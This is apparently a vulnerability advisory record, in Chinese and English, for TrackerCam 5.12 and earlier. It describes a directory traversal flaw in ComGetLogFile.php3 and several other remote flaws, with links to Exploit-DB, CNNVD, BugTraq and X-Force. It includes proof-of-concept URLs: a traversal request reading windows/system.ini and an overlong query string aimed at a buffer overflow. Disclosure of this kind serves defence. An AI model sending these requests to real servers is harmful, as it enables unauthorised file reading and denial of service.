https://www.exploit-db.com/exploits/25123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-149

TrackerCam5.12及更早版本的ComGetLogFile.php3中存在目录遍历漏洞，远程攻击者可以通过”..”序列和fn参数中的(1)”/”(斜杠)、(2)””(反斜杠)或(3)十六进制编码字符来读取任意文件。

source: http://www.securityfocus.com/bid/12592/info

TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues.

A remote attacker could exploit these issues to execute arbitrary code, obtain potentially sensitive information, launch phishing attacks or steal cookie based authentication credentials, and deny service to legitimate users. 

http://www.example.com:8090/MessageBoard/messages.php?aaaaaaaaaaa[256]aaaa
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log

来源:XF
名称:trackercam-fn-directory-traversal(19414)
链接:http://xforce.iss.net/xforce/xfdb/19414
来源:BID
名称:12592
链接:http://www.securityfocus.com/bid/12592
来源:BUGTRAQ
名称:20050218MultiplevulnerabilitiesinTrackerCam5.12
链接:http://www.securityfocus.com/archive/1/390918